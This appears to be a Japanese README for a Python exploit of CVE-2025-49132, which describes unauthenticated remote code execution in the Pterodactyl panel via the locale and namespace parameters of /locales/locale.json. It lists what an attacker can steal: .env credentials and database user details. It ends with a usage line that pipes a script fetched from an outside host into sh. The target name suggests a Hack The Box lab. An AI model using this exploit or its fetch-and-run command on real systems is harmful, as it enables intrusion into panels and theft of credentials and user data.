
CVE-2025-49132用のPythonエクスプロイト。細工されたロケールと名前空間パラメータを介して、Pterodactylパネルで認証なしのリモートコード実行を可能にします。
影響
/locales/locale.json を locale および namespace クエリパラメータとともに使用することで、悪意のある攻撃者は認証なしで任意のコードを実行することができます。
任意のコードを実行できるため、この脆弱性は無数の方法で悪用される可能性があります。パネルのサーバーへのアクセス権の取得、パネルの設定(.env またはその他)からの認証情報の読み取り、データベースからの機密情報の抽出(ユーザー名、メールアドレス、姓名、ハッシュ化されたパスワード、IP アドレスなどのユーザー詳細)、パネルが管理するサーバーのファイルへのアクセスなどに使用される可能性があります。
使用方法
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'